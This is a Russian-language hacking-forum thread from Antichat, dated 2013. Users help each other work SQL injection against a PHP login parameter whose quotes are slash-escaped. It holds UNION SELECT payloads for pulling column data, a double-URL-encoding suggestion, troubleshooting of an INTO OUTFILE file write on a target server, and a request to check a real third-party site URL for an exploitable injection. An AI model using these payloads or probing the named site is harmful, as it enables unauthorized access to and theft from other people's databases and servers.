ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.11.2013, 23:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от qaz
qaz said:
есть уязвимый на скулю скрипт, типа такого
$login = $_GET['login'];
SELECT id, user_name FROM users WHERE user_login = '$login'
ковычки слешируются, как составить любой запрос на выборку данных?
Сообщение от None
SELECT id, text FROM `news` WHERE user_login =
'\' UNION SELECT 1, concat_ws(0x3a,column1,column2) from table_name; --';
____
|
|
|
|
14.11.2013, 23:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от YaBtr
YaBtr said:
____
ну также как бы будет ошибка и ничего не выведет
|
|
|
|
15.11.2013, 01:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от qaz
qaz said:
ну также как бы будет ошибка и ничего не выведет
Соглашусь, ибо потестировал!
Тебе необходимо еще одно поле (с помощью слэшей коментируется часть запроса).
Например:
Сообщение от None
SELECT id, text FROM `news` WHERE user_login =
'\' && 'UNION SELECT 1, concat_ws(0x3a,column1,column2) from table_name; --';
|
|
|
|
15.11.2013, 01:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Можно так-же попробовать двойным url енкодингом попробовать пронести кавычку, но это очень сомнительно, но всё-же..)
|
|
|
|
15.11.2013, 04:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
при попытке into outfile выскакиевает ошибка "CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error". При повторном запросе того же самого запроса с тем же путем и тем же файлом, пишет "CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error: 1086 File ', home=>www, pp2.txt' already exists. Файл в итоге этот все равно не создается, и несуществует (не инклудится). Пробовал разные папки и разные имена файлов. file_priv Y.
Разжуйте пожайлуста что ему ненравится тут, и что можно сделать. Спасибо
|
|
|
|
15.11.2013, 12:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
16399
Репутация:
10
|
|
Сообщение от qaz
qaz said:
есть уязвимый на скулю скрипт, типа такого
$login = $_GET['login'];
SELECT id, user_name FROM users WHERE user_login = '$login'
ковычки слешируются, как составить любой запрос на выборку данных?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"\' union select 1,2-- "[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
после слеширования кавычек получается
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"\\' union select 1,2-- "[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
\\ - экранированный обратный слеш.
----
Сообщение от None
при попытке into outfile выскакиевает ошибка "CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error". При повторном запросе того же самого запроса с тем же путем и тем же файлом, пишет "CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error: 1086 File ', home=>www, pp2.txt' already exists. Файл в итоге этот все равно не создается, и несуществует (не инклудится). Пробовал разные папки и разные имена файлов. file_priv Y.
Разжуйте пожайлуста что ему ненравится тут, и что можно сделать. Спасибо
Возможно дело в правах выставляемых на файл. То есть он создаётся, но тот от кого выполняется процесс php прочитать его не может. Может быть дело в правах на папке, пробовал /tmp? Если нет то попробуй там создать.
|
|
|
|
15.11.2013, 17:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от Ganz Euler
Ganz Euler said:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"\\' union select 1,2-- "[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
\\ - экранированный обратный слеш. В итоге запрос будет выглядеть вот так:
SELECT id, user_name FROM users WHERE user_login = '\' union select 1,2--'
Т.е запись \' union select 1,2-- - обычный текст (логин).
|
|
|
|
15.11.2013, 17:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
16399
Репутация:
10
|
|
Неправильно написал я немного, но по сути верно всё.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Код:
Code:
sergey@notebook $ php test.php
\\' union select 1,2--
Т.е. запрос SELECT id, user_name FROM users WHERE user_login = ' \\' union select 1,2-- '
С точки зрения PHP правильно было бы написать мне тогда
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"\\\\' union select 1,2-- "[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
, я же написал значение переменной по факту. |
|
|
|
15.11.2013, 17:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Да, действительно верно, не обратил изначально внимание на сторону php В общем, чтобы запрос сработал, автору нужно в логин отправить \' и далее подставить сам запрос.
|
|
|
|
18.11.2013, 19:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
2764
Репутация:
0
|
|
нужна помощь ) тут есть скуль? у меня не получается раскрутить =\
Сообщение от None
http://www.circassian-genocide.com/cg-maps.php?page='&showold=yes
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
